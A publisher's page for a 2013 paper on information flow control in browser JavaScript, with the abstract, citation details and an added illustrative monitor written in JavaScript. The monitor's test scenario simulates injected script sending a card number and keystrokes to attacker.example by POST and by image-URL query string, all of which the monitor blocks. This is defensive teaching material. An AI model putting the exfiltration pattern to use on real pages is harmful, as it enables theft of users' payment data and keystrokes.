Towards Precise and Efficient Information Flow Control in Web Browsers

  • Conference paper
Trust and Trustworthy Computing (Trust 2013)

Part of the book series: Lecture Notes in Computer Science (LNSC, volume 7904)

Abstract

JavaScript (JS) has become the dominant programming language of the Internet and powers virtually every web page. If an adversary manages to inject malicious JS into a web page, confidential user data such as credit card information and keystrokes may be exfiltrated without the user's knowledge.

We present a comprehensive approach to information flow security that allows precise labeling of scripting-exposed browser subsystems: the JS engine, the Document Object Model, and user-generated events. Our experiments show that our framework is precise and efficient, and detects information exfiltration attempts by monitoring network requests.
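The abstract names three labelled sources (JS engine values, DOM nodes, user-generated events) and one enforcement point (outgoing network requests). The following toy monitor, written in JavaScript as an added illustration and not code from the paper or its browser implementation, shows how those pieces fit: values read from a simulated DOM field or keystroke event carry a label, the label propagates through string operations, and the network sink checks the joined label of the request URL and body against the destination origin. Everything here is assumed for the illustration: labels are sets of origins ordered by subset inclusion with set union as join, the policy is that an origin may only receive data labelled with itself or public data, and the DOM contents, page origin and request targets are constructed sample data.

```javascript
// Toy dynamic information-flow monitor (added example; assumptions noted inline).
// A value's label is the set of origins it derives from; join is set union.
class Labeled {
  constructor(value, origins) {
    this.value = value;
    this.label = new Set(origins);
  }
}

const labelOf = (x) => (x instanceof Labeled ? x.label : new Set()); // unlabelled = public
const valueOf = (x) => (x instanceof Labeled ? x.value : x);
const join = (a, b) => new Set([...a, ...b]);

// Labelled string concatenation: the result inherits the join of both operand labels.
function concat(a, b) {
  return new Labeled(String(valueOf(a)) + String(valueOf(b)), join(labelOf(a), labelOf(b)));
}

// Simulated DOM source (constructed data): form fields belong to the document's origin.
const PAGE_ORIGIN = "https://bank.example";
const dom = { "#cc-number": "4111111111111111" };
function readField(selector) {
  return new Labeled(dom[selector], [PAGE_ORIGIN]);
}

// Simulated user-generated event source: each keystroke is labelled with the page origin.
function keyEvent(key) {
  return new Labeled(key, [PAGE_ORIGIN]);
}

// Network sink monitor. Both URL and body are checked, because exfiltration through a
// query string (e.g. an image load) is as common as through a POST body.
// Policy (assumed): an origin may only receive values whose label contains no other origin.
const requestLog = [];
function sendRequest(url, body) {
  const dest = new URL(valueOf(url)).origin;
  const flows = join(labelOf(url), labelOf(body));
  const leaking = [...flows].filter((origin) => origin !== dest);
  const blocked = leaking.length > 0;
  requestLog.push({ url: valueOf(url), dest, blocked, leaking });
  return !blocked; // true = request allowed to proceed
}

// Behaves like injected malicious JS: read the card number, capture keystrokes,
// and try to ship both to a third-party origin by several routes.
function runScenario() {
  requestLog.length = 0;
  const card = readField("#cc-number");
  let typed = new Labeled("", []);
  for (const k of "1234") typed = concat(typed, keyEvent(k));
  const payload = concat(concat(card, "|"), typed);

  return {
    sameOriginPost: sendRequest("https://bank.example/api/pay", payload),
    crossOriginPost: sendRequest("https://attacker.example/collect", payload),
    crossOriginUrl: sendRequest(concat("https://attacker.example/i.gif?d=", payload), null),
    crossOriginPublic: sendRequest("https://cdn.example/lib.js", null),
  };
}

console.log(runScenario(), requestLog);
```

Only the two requests that carry bank-labelled data to attacker.example are blocked; the same-origin POST and the unlabelled third-party script load go through. The model tracks explicit flows only; implicit flows through control dependence, which the paper's references on JavaScript information flow address, are outside what this sketch covers.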

This material is based upon work partially supported by the Defense Advanced Research Projects Agency (DARPA) under contract No. D11PC20024, by the National Science Foundation (NSF) under grant No. CCF-1117162, and by a gift from Google. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the Defense Advanced Research Projects Agency (DARPA) or its Contracting Agent, the U.S. Department of the Interior, National Business Center, Acquisition Services Directorate, Sierra Vista Branch, the National Science Foundation, or any other agency of the U.S. Government.



Copyright information

© 2013 Springer-Verlag Berlin Heidelberg

About this paper

Cite this paper

Kerschbaumer, C., Hennigan, E., Larsen, P., Brunthaler, S., Franz, M. (2013). Towards Precise and Efficient Information Flow Control in Web Browsers. In: Huth, M., Asokan, N., Čapkun, S., Flechais, I., Coles-Kemp, L. (eds) Trust and Trustworthy Computing. Trust 2013. Lecture Notes in Computer Science, vol 7904. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-642-38908-5_14


  • DOI: https://doi.org/10.1007/978-3-642-38908-5_14

  • Publisher Name: Springer, Berlin, Heidelberg

  • Print ISBN: 978-3-642-38907-8

  • Online ISBN: 978-3-642-38908-5
